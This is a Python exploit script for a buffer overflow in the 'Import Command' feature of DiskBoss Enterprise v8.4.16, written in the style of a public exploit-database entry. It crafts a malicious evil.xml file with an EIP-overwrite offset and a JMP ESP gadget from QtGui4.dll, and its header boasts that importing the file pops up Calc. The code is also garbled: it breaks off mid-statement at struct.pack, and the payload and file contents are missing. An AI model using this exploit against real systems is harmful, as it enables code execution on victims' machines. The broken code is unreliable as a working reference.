#!/usr/bin/python #======================================================================================================================== # Exploit Author: Touhid M.Shaikh # Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow # Date: 29-09-2017 # Website: www.touhidshaikh.com # Contact: https://github.com/touhidshaikh # Vulnerable Software: DiskBoss Enterprise v8.4.16 # Vendor Homepage: http://www.diskboss.com # Version: v8.4.16 # Software Link: http://www.diskboss.com/downloads.html # Tested On: Windows 7 x86 # # # To reproduce the exploit: # 1. right Click, click on Import Command # 2. select evil.xml , Booom Calc POPED up.. ;) #======================================================================================================================== import os,struct import sys #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('' f = open('evil.xml', 'w') f.write(file) f.close() #GREETZ ---------- #Taushif(Brother) #-----------------